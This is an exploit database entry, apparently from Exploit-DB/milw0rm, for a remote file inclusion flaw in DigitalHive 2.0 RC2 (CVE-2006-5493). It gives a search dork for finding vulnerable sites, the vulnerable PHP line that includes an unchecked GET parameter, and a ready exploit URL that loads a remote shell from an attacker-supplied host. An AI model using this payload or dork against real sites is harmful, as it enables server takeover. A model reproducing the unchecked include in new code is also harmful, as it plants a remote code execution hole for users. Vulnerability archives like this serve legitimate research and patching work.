DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion

Author: SHiKaA
type: webapps
platform: php
port: 
date_added: 2006-10-14  
date_updated: 2016-11-08  
verified: 1  
codes: OSVDB-31068;CVE-2006-5493  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comhive v2.0 RC2.zip  

raw file: 2566.txt  
#==============================================================================================
#DigitalHive <= v2.0 RC2 (page) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
#
#Version : v2.0 RC2
#
#================================================================================================
#
#DORK : "Powered by DigitalHive"
#
#================================================================================================
#Bug in : template/purpletech/base_include.php
#
#Vlu Code :
#--------------------------------
#
#        <?php include ($_GET["page"]); ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/template/purpletech/base_include.php?page=http://SHELLURL?
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-10-15]